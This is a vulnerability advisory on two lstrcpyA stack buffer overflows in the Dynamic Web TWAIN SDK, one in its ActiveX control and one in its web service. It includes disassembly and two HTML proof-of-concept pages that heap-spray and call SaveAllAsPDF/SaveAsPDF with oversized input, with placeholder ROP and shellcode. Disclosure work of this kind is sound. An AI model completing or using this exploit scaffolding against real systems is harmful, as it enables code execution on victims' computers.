SSD Advisory – Dynamic Web TWAIN SDK Vulnerabilities

Introduction
Dynamic Web TWAIN is a TWAIN-based scanning SDK software specifically designed for web applications. With just a few lines of code, you can develop robust applications to scan documents from TWAIN-compatible scanners, edit the scanned images and save them to a file system.
Vulnerability Details
Two security vulnerabilities have been found in Dynamic Web TAWIN:
 

  • DynamicWebTwainCtrl.DynamicWebTwain.1 ActiveXObject SaveAllAsPDF/SaveAsPDF Methods lstrcpyA() Call Stack Buffer Overflow Vulnerability
  • WebTWAINService.exe Service SaveAllAsPDF/SaveAsPDF Methods lstrcpyA() Call Stack Buffer Overflow Vulnerability


DynamicWebTwainCtrl.DynamicWebTwain.1 ActiveXObject SaveAllAsPDF/SaveAsPDF Methods lstrcpyA() Call Stack Buffer Overflow Vulnerability
The Dynamic Web TWAIN installs an ActiveX control with the following settings:

CLSID: {FFC6F181-A5CF-4ec4-A441-093D7134FBF2}
Progid: DynamicWebTwainCtrl.DynamicWebTwain.1
Binary Path: C:\Windows\SysWOW64\Dynamsoft\DynamicWebTwain\DynamicWebTwainCtrlTrial.dll
Implements IObjectSafety: False
Safe For Initialization (Registry): True
Safe For Initialization (Registry): True

According to the registry, this control is safe for scripting and safe for initialization, then Internet Explorer will allow to script its properties and methods according to the target user browser security settings.
The ActiveX offers the SaveAllAsPDF and SaveAsPdf methods, see typelib:

...
/* DISPID=355 */
/* VT_BOOL [11] */
function SaveAllAsPDF(
/* VT_BSTR [8] [in] */ $FileName <--------------
)
{
/* method SaveAllAsPDF */
}
/* DISPID=354 */
/* VT_BOOL [11] */
function SaveAsPDF(
/* VT_BSTR [8] [in] */ $FileName, <--------------
/* VT_I2 [2] [in] */ $sImageIndex
)
{
/* method SaveAsPDF */
}
...

the FileName parameter suffers of stack buffer overflow vulnerability because of a dangerous call to lstrcpyA() inside the DynamicWebTwainCtrlTrial.dll
Vulnerable Code
Vulnerable code inside DynamicWebTwainCtrlTrial.dll:

;----------------------------------------------------------------------------------------------------
 1003324F                           SUB_L1003324F:
...
 10033290  F3AB                      		rep stosd
 10033292  66AB                      		stosw
 10033294  AA                        		stosb
 10033295  8D85DCFEFFFF              		lea	eax,[ebp-00000124h]
 1003329B  50                        		push	eax
 1003329C  FF159C720710              		call	[KERNEL32.dll!lstrcpyA]   <---------
 100332A2  8D85DCFEFFFF              		lea	eax,[ebp-00000124h]
 100332A8  6A04                      		push	00000004h
 100332AA  50                        		push	eax
...
;----------------------------------------------------------------------------

Exploit

<html>
<object classid="clsid:FFC6F181-A5CF-4ec4-A441-093D7134FBF2" id="obj">
</object>
<body>
<div id="blah"></div>
<script>
var div_container = document.getElementById("blah");
        div_container.style.cssText = "display:none";
        var data;
        offset = 0x100;
        junk = unescape("%u0c0c%u0c0c");
        while (junk.length < 0x1000) junk += junk;
        rop = unescape("%u4141%u4141");
        shellcode = unescape("%u4141%u4141");
        data = junk.substring(0,offset) + rop + shellcode
        data += junk.substring(0,0x800-offset-rop.length-shellcode.length);
        while (data.length < 0x80000) data += data;
        for (var i = 0; i < 0x800; i++)
        {
                var x = document.createElement("button");
                x.title = data.substring(0,0x40000-0x58);
                div_container.appendChild(x);
        }
var xx="";
for(i=0;i<500;i++){
xx=xx+"A";
}
obj.SaveAllAsPDF(xx);
//obj.SaveAsPDF(xx,1);
</script>
</body>
</html>

WebTWAINService.exe Service SaveAllAsPDF/SaveAsPDF Methods lstrcpyA() Call Stack Buffer Overflow Vulnerability
Similar to the above ActiveX, the WebTWAINService.exe which renders incoming requests from users (via a web browser) is vulnerable to the same attack just through a different vector.
Vulnerable Code
Vulnerable code inside the WebTWAINService.exe:

;----------------------------------------------------------------------------------------------------
 00462CE0                           CASE_PROCTABLE_00462CE0:
 00462CE0  282B4600                 		dd	CASE_00462CE0_PROC0000
 00462CE4  282B4600                 		dd	CASE_00462CE0_PROC0000
 00462CE8  4E2B4600                 		dd	CASE_00462CE0_PROC0002
 00462CEC  282B4600                 		dd	CASE_00462CE0_PROC0000
 00462CF0  3B2B4600                 		dd	CASE_00462CE0_PROC0004
 00462CF4  CCCCCCCCCCCCCCCCCCCC+     		Align	16
 00462D00                           SUB_L00462D00:
 00462D00  6AFF                      		push	FFFFFFFFh
...
 00462D8A  56                        		push	esi
 00462D8B  8D542440                  		lea	edx,[esp+40h]
 00462D8F  52                        		push	edx
 00462D90  FF1564034E00              		call	[KERNEL32.dll!lstrcpyA] <--------- vulnerable call
...
;----------------------------------------------------------------------------------------------------

Exploit

<!DOCTYPE html>
<html>
<head>
<title>
	Dynamic Web TWAIN POC 02
</title>
<script>
function spray(){
var x=[];
for(i=0;i<300000;i++){x.push(new String("AAAA"))}
}
function crash(){
var x=""; for(i=0;i<1000000;i++){x+="AAAA"}
var y=""; for(i=0;i<100000;i++){y+="AAAA"}
var a=window.navigator.appVersion;
var b=a.match(/AppleWebKit/);
var c=a[0]==="AppleWebKit";
if (c===false){try{
dwtcontrolContainer_Obj.SaveAllAsPDF(x) // Internet Explorer
}
catch(e){}};
DWObject.SaveAsPDF(x); // Google Chrome, Firefox, Opera
}
</script>
<script type="text/javascript" language="javascript" src="Resources/dynamsoft.webtwain.initiate.js?t=150417"></script>
<script type="text/javascript" language="javascript" src="Resources/dynamsoft.webtwain.config.js"></script>
<script type="text/javascript" language="javascript" src="Scripts/online_demo_operation.js"></script>
<script type="text/javascript" language="javascript" src="Scripts/online_demo_initpage.js"></script>
<script type="text/javascript" language="javascript" src="Scripts/jquery.js"></script>
</head>
<body>
<div id="blah"></div>
<div id="DWTcontainer" class="body_Broad_width">
     <div id="dwtcontrolContainer"></div>
     <div id="DWTNonInstallContainerID"></div>
     <div id="DWTemessageContainer"></div>
</div>
<script>
var div_container = document.getElementById("blah");
        div_container.style.cssText = "display:none";
        var data;
        offset = 0x100;
        junk = unescape("%u0c0c%u0c0c");
        while (junk.length < 0x1000) junk += junk;
        rop = unescape("%u4141%u4141");
        shellcode = unescape("%u4141%u4141");
        data = junk.substring(0,offset) + rop + shellcode
        data += junk.substring(0,0x800-offset-rop.length-shellcode.length);
        while (data.length < 0x80000) data += data;
        for (var i = 0; i < 0x800; i++)
        {
                var x = document.createElement("button");
                x.title = data.substring(0,0x40000-0x58);
                div_container.appendChild(x);
        }
setTimeout(function(){crash()},6000);
</script>
</body>
</html>

Vendor Response
Dynamic Web TWAIN version 11.3 has been released to address the above listed issues: http://www.dynamsoft.com/Downloads/WebTWAIN_Download.aspx.